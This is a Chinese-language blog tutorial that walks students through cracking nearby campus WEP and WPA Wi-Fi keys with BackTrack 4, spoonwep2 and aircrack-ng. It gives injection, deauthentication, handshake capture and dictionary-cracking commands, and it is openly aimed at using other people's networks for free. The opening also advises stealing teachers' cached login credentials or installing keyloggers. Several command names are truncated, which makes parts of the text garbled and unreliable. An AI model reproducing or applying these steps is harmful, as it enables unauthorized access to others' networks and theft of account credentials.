WIFI破解全过程BT4

admin管理员组

文章数量:1531279

2023年12月31日发(作者：)

PS:本篇文章主要写给大一新生，且与还没来得及去买上网号的童鞋们。更主要是自己破解省了网费的支出了。其

实这样做完全没必要，每个老师都有学校给的太极上网号，在老师下课

去厕所到时候，可以到讲桌电脑里考个CIAN把缓存到IE里的账号查出来

，诸如：

或者直接放键盘记录器，方法很多，不废话了。之前说了要先发破解

无极的AP教程，但是因为一些变故没法发了，见谅，但是我可以提示一

点，大家知道的可以自己去试试：当连接上无极的路由时候滞留于网关

上的复写加密动态密钥其实已经保存到太极登陆软件的缓冲区了，用OD

破之!非常简单。(只不过太极每次连接的时候都生成的不一样的串码)

=====================================

学校里有很多的无线路由器，但基本都WEP/WPA1/2的加密过了，想要连

接上去只有知道AP的128或64位密钥才行，看看我宿舍所在的地方有多少无线路由连接

但是在大部分测试的WEP加密

方式中，基本快则5分钟，慢则半小时就可破解掉了其连接密钥，只要

对方不在路由选项里过滤你的MAC，你可以随时的蹭网用。如图：

现在网上流传的WEP/WPA工具很多，也很杂，当本人全部大概用过后

还是觉得BT+SPOONWEP/WPA比较傻瓜化，效率也奇高，其他的软件就不

多鳌述了。

环境：XP

显卡：wifi inter link 5100 agn

驱动：最新

软件：BT3或BT4 BATE或BT4 PRI（因为本人的显卡是最新版的，所以前

两种LINUX下未集成本网卡驱动，所以不支持诸如嗅探，扫描与注入的

操作，推荐大家去下载前两种）

破解软件：spoonwep2和spoonwpa

==========================================

我们这里先用BT4+spoonwep2来做一下示范吧，其他的原理都是相同的

。

一：启动BT4

首先下载好BT4和spoonwep2

将两者解压，再把解压出来的放到BT4modules目录中

如果你是下载的光盘版就直接刻录成光碟，然后重启电脑的时候选择光

盘启动项目，如果你是下载的USB版就直接保存到USB上，启用USB启动

，VM版的BT4可能对集成的无线网卡支

持不太好，USB无线网卡则支持得很好，启动方法很多，但是都很麻烦

，我这里讲一种硬盘启动方法：

BT4（bt4-pre-final版）是基于ubuntu的linux，采用grub方式引导。

一、 准备工作：

1、下载grub4dos软件最新版；

2、下载，把中的boot、casper

文件夹复制出来放到E盘根目录下。

二、步骤：

1、把grub4dos压缩包解压缩，将grldr、、三个文件

拷入C盘根目录；

2、编辑C盘下的，在的最后加上一行：

c:grldr="Load GRUB4DOS"。如果中的timeout值为零，把它

设置为大于0的数字，例如timeout=3，然后保存。

3、编辑C盘下的

color black/cyan yellow/cyan

timeout 30

default /default

fallback 1

splashimage (hd0,5)/boot/grub/

title Boot BackTrack 4

kernel (hd0,5)/boot/vmlinuz BOOT=casper boot=casper

nopersistentrw quiet vga=0x317

initrd (hd0,5)/boot/

title Start Windows

rootnoverify (hd0,0)

makeactive

chainloader +1

title Shutdown the Computer

halt

title Reboot the Computer

reboot

可以将原里面的内容都删除，写入上述内容，需注意格式。

关键的一点是：kernel (hd0,5)/boot/vmlinuz BOOT=casper

boot=caspernopersistentrw quiet vga=0x317 此行参考bt4里面

的，只是添加了(hd0,5)，如果bt4放在C盘启动则不需要添加

。

(hd0,5)的计算是hd0为第一块主硬盘，在grub下逻辑分区从4开始，所

以D盘即为4，E盘即为5。

重启选择Load GRUB4DOS，再选Boot BackTrack 4，即可启动BT4。

此方法bt4将E盘当作cd读取，系统启动后不能识别硬盘其他分区，所在

的E盘可读不可写，不知甚原因。

====我自己修改了个汉化集成软件版本，实在没法启动的童鞋找我要吧

====

二：破解密码（GUI版）

通过以上的几种方法皆可启动下载的BT4，如图：

之后就需要输入“startx”进入系统了，如图：

然后进入系统的时候就开

始破解了，现在就要去找spoonwep2了，左下角开始的旁边有个黑色的

框框，也就是SHELL，点击，输入：spoonwep就可以显示spoonwep2的界

面了。如图：

在各项选项里选择以下操作

NET CARD 网卡接口 选择 WIFI0

DRIVER 驱动 选择 NORMAL

MODE 模式 选择 UNKNOWN VICTIM

然后点击下面的NEXT,接着就会转入VICTMS DISCOVERY界面。

好了，可以看见VICTMS DISCOVERY界面左面的选项是默认的CHAN

HOPPING 这个事无线的AP的工作频道，不要动，直接点击右侧的LAUNCH

按钮。

这时会弹出抓包窗口（SCAN），可作为参考，也可不用理会。稍等一

会儿，如果能够找到符合要求的信号，会在当前的victims discovery

窗口中显示扫描到的信息，其中：

ESSID 路由广播名称

MAC 路由的MAC地址

CHAN 使用的频道

POW 信号强度

DATA (注意：这个数值一直为0基本无法破解，你可另寻时机

等到有DATA再破）

CLIS 空白代表无客户端，打钩则代表有客户端

每一行代表一个扫描到的无限AP信号，点击选中你要破解的信号（尽

量选择有DATA以及CLIS后有对号的信号进行破解）；然后在信号信息框

的下面相应的显示出在AP当前的客户端，你可以点击选中一个客户端（

这样更容易破解一些），也可以不选。然后点击窗口下边的selection

OK按钮，就会进入attack panel界面。

在attack panel界面，攻击模式下拉框中几个选项的区别如下（由客

户端建议选择第一项，无客户端建议选择第四项）：

ARP REPLAY ATTACK （有客户端时用,3ARP注入）

P0841 REPLAY ATTACK (第三选择，2交互注入）

CHOPCHOP & FORGEATTACK （第二选择，4断续注入）

FRAGMENTATION & FORGE ATTACK（首选，5碎片注入）

然后直接点击launch即可是破解，这时同样会在任务栏出现一个新的

窗口，你可以用鼠标点击出来看一看，里面会显示一些相关的信息，如

信号强度等。大家注意上面图片里有个‘24858 IVS’，其中IVS就是我们要寻找的带有特殊数据包的IVS格式包，我说的抓包其实就是抓的这个IVS包。基本学校里的密钥抓到大概10000IVS就差不多出密码了，如果到了4W还没显示密码的话，我还是劝告童鞋去换个目标吧，这段抓包的时间就去喝喝茶，去看看书吧。因为我们是被动抓的包，所以必须跳个好点，流量大的时间段去破解，因为那时候对方在下迅雷的时候，会飞快的产生IVS包，所以我建议大家在12点半到1点半，晚上九点半到11点半，这两段时间内选择破解，因为是上网的高峰。注意，最后破解出来的密码是在attack panel界面下方显

示（而不是在spoonwep dump窗口显示）。

密码就是：52 15 21 13 14.

然后，重启进入XP系统，选择无线连接里的你刚才破解的那个AP，填上密钥，就能享受免费带来的上网乐趣了。

============================================================

以上是最最最最简便的傻瓜方法，一般都是那样破解的方便也省事儿，但是有的时候，目标AP不会产生大量的IVS包，会对于我们抓包产生非常大的影响，因为本身没有太多的流量

产生，我们在通过WIFI的TCP握手的时候产生的有效IVS也会少的可怜，这样对于必须要抓至少10000IVS来说，简直是浪费时间，所以，这时候我们就要化被动为主动的注入，使其多产生相互之间的更多数据交汇，这样针对没有客户的AP或者在空闲的AP来说是非常有效地。

三:手动注入（SHELL代码注入，新手跳过）

以下主要针对SHELL的代码输入操作，其实SPOONWEP就看做一个界面型的代码整合软件，现在我们要脱离它的帮助，自己去手动注入。

还是拿我的5100网卡做演示（其他的网卡方法大体一致，网上搜更多的资料看看吧）

shell 1:----------------------------------------

ig -a

[

macchanger -m 00:11:22:33:44:55 wlan0

<修改自己网卡的MAC 地址。当对方设置了MAC 地址过滤时或为了方便后面输入>

]

ig -a wlan0 up

(5100可能要加载网卡才支持注入?)

-ng start wlan0 6

(6是频道)

另一说5100要支持注入用airmon-ng start wlan0

如果这里回显<(monitor mode enabled)> 则下面命令所有端口号要用"wlan0"

[

aireplay-ng -9 mon0 / aireplay-ng --test mon0

(注入攻击成功/不成功)

(检测你的网卡是否支持注入)

]

mp-ng -w pack -c 6 mon0/wlan0

(pack是随便起的获取的ivs的保存文件的名字)

另一说用airodump-ng --ivs -w pack -c 6 mon0/wlan0

shell 2:----------------------------------------

一、有客户端：

破解:abcd四种方式

a.合法客户端产生大量有效的数据，能直接获得大量cap。

收到10000以上data后，直接转shell 3,破解密码

b.合法客户端只能产生少量数据，就需要注入<-3>攻击加速产生大量数据。

ay-ng -3 -b (APmac) -h 1(合法客户端mac)

mon0/wlan0(wlan0测试不行)

,send 71524 packets ... 很多类似行>

c.合法客户端不在通信，注入模式不成功，

用-0 冲突模式强制断开合法客户端和ap连接，使之重新连接，

新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入

ay-ng -3 -b (APmac) -h 1(合法客户端mac) wlan0

ay-ng -0 10 -a (APmac) -c 1(合法客户端mac) wlan0

(可能要另开窗)

d.有客户端，并且客户端能产生有效arp 数据的另类破解方式

输入modprobe –r iwl3945

(加载网卡)

输入modprobeipwraw

输入airmon-ng start wlan0 6

现在，只要一个命令就搞定，输入:

输入wesside-ng -i wlan0 -v 01:02:03:04:05:06<此格式的APmac>。

二、无客户端：

ay-ng -1 0 -a (APmac) -h 1(Mymac) mon0

(我成功了)

另一说用aireplay-ng -1 0 -e Kingnet -a (APmac) -h (Mymac) mon0/wlan0

(建立虚拟伪装连接)

如果失败可尝试降低网卡速率后再试:iwconfig mon0 rate 2M(注意大写)

破解:abcd四种方式

a.-2 crack mode ---------------

建立虚拟连接后直接用-2交互攻击模式集合了抓包，提数据和发包攻击

ay-ng -2 -p 0841 -c ffffffffffff -b (ap mac) -h (my mac) wlan0

发包成功后可得到足够的ivs，然后用aircrack-ng破解

b.-3 crack mode ---------------

ay-ng -3 -b (AP mac) -h (MY mac) mon0

7.用aircrack-ng破解<自己添加的步骤?>

c.-4 crack mode ---------------

-4攻击模式；制造数据包；-2交互式攻击模式

ay-ng -4 -b (APmac) -h (Mymac) mon0

forge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 –l 255.255.255.255

-y -w myarp

(提取上面xor 文件来伪造一个arp包)

ay-ng -2 -r myarp mon0

一说用aireplay-ng -2 -r myarp -x 512 mon0

(发现了可利用的myarp的数据包，按y后，立刻注入攻击。Date疯涨)

9.用aircrack-ng破解

d.-5 crack mode ---------------

-5碎片攻击模式；制造数据包；-2交互式攻击模式

(我成功过)

ay-ng -5 -b (ap mac) -h (my mac) mon0

(利用-5 碎片攻击模式获得一个可用的包含密钥是数据文件（xor 文件）)

forge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 -l 255.255.255.255 -y

-w myarp

(Myarp随便起的文件名)

ay-ng -2 -r myarp -x 256/512 mon0

(这时，前面的抓包窗口上的data 将迅速增加)

(512是攻击速度，1024是最大值)

9.采用aircrack-ng 来进行破解

shell 3:----------------------------------------

aircrack-ng *.cap

如果shell 1用了--ivs 参数，则这里用aircrack-ng *.ivs

(我成功了)

另一说用aircrack-ng -n 64 -b APmac

>

附:

5100用BT4+spoonwep2破解

1.把spoonwep2放在BT4modules下,启动BT4

2.

ln -fs bash /bin/sh

ls -al /bin/sh

<显示bash为成功,dash为失败>

3.开spoonwep2，里面可以找到网卡了,选wlan0进入搜索，但这时不会搜出来什么，

关闭一下spoonwep2再重启spoonwep2，

这时网卡项里有一个mon0的，选mon0,driver选normal,mode选unknow victim,选定PO841

replay attack，点击launch后就等待密

码的出来(sata数据包到30000个左右)。

(注：论坛中的高手说spoonwep2支持5100AGN网卡注入式破解)

---------------------end---------------------

---------------------WPA---------------------

ig -a

ig -a wlan0 up

-ng start wlan0 6

(6是频道)

mp-ng -w 12345 -c 6 mon0/wlan0

(保存名为)

(-w：写入文件，-c：截取cap的频道)

ay-ng -0 10 -a (ap mac) mon0/wlan0

或者输入：aireplay-ng -0 10 -a (ap mac) -c (合法客户端mac) mon0/wlan0(wlan0可能

不对)

<18:56:20 Sending 64 directed DeAuth,... 一些类似行>

(-c后面为合法无线客户端的MAC地址)

(迫使AP重新与已连接的合法客户端重新握手验证)

(攻击几次后可以做破解尝试。WPA破解不用等到数据Data 达到几万，

因为它只要一个包含WPA握手验证包就可以了)

Cap数据包破解:

a.暴力破解

ck-ng -x -f 2 12345*.cap

另一说是用aircrack-ng -z -b (ap mac) 12345*.cap

b.字典破解

ck-ng -w 12345*.cap

另一说是用aircrack-ng -w -b (ap mac) 12345*.cap

(

-w：是字典破解模式

是你事先准备好的字典。

技巧：可以在windows 下使用下载的字典工具生产字典，再在BackTrack3 下拷贝到/root

下（aircrack 默认

的工作目录在/root）。

请注意，破解WPA 密码的时间取决于密码难易程度，字典包含程度，内存及CPU 等。多则数小时。

)

c.把CAP数据包拷贝出来在WIN下用WinAircrack 破解

启动WinAircrack,General-)Encryption type-)wpa-psk,Capturefiles-)

Wpa-)Dictionary file-),点右下角Aircrack

破解

-f -d -s D-LINK (注意大小写)

(Windows版本操作步骤与其Linux下版本完全一致)

(

参数解释：

-f 这里跟上采用的字典

-d 生成的Table文件名称

-s 目标AP的ESSID

)

ty -d -r *.cap -s D-LINK

(

参数解释：

-d 导入WPA PMK Hash Table文件名称，下图中为

-r 事先捕获的WPA握手数据包

-s 目标AP的ESSID

)

---------------------end---------------------

WPA破解，怎么知道有握手包被截获？

airodump-ng监视窗右上角有提示:

...... WPA handshake: 00:90:4c:8e:00:65

BT4抓包后，cap文件保存在哪？

输入ls可以看到啊,默认在root下。

如何获得合法端mac？

windows下可以使用OmniPeek、Wireshark、Ethereal、Aircrack-ng for Windows等工具实现对客户端MAC的拦截，Linux可用

Kismet、Aircrack-ng中的airodump-ng等来实现。需要注意的是，若目标网络采用WEP或者WPA加密的话，有时需先行破解再对数据

包解密方可看到客户端MAC。

前面第一个shell，如下若有station显示,bb:bb:bb:bb:bb:bb就是合法客户端mac

BSSID STATION ...

aa:aa:aa:aa:aa:aabb:bb:bb:bb:bb:bb

如何查找隐藏的SSID？

1.在BT4下先打开一个shell,输入

airodump-ng 网卡端口

2.打开另一个shell,输入

aireplay-ng -0 10 -a AP'MAC -c 合法客户端'MAC 网卡端口

可能这个命令由于频道不对会出错,这时就要多重输几次(如果不行,就是不是合法客户端,要再试其它的客户端),直到提示成功为止

3.然后就可以在上个shell,看到显示出来的SSID。

最后简单的概括就是以下的八部操作：

1) ifconfig -a

2) airmon-ng start wifi0 6

3) airodump-ng --ivs -w name -c 6 ath1

4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1

-1 is -one

5) aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1

新的第5步： aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 ath1

6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255

-y -w mrarp

7) aireplay-ng -2 -r mrarp -x 1024 ath1

8) aircrack-ng -n 64 -b ap_mac

最后截图就是这样的

=================================================================

以上大概就是注入的全部过程了，大家看着眼花，我自己写的也糊里糊涂，有的还是从网上摘得文献

在这里就说到这里了，有兴趣的童鞋疑问的地方就在下面留言吧，坚持努力的多看看，多试试，破解无线路由的连接密钥其实非常简单，在这里，我推荐一个非常好的无线破解论坛； /bbs/

要是想多了解关于无线文献的话，推荐去图书楼四楼的阅览室2最东头倒数三四排，里面全是无线技术的文章文献。。

本文标签： 破解客户端网卡注入数据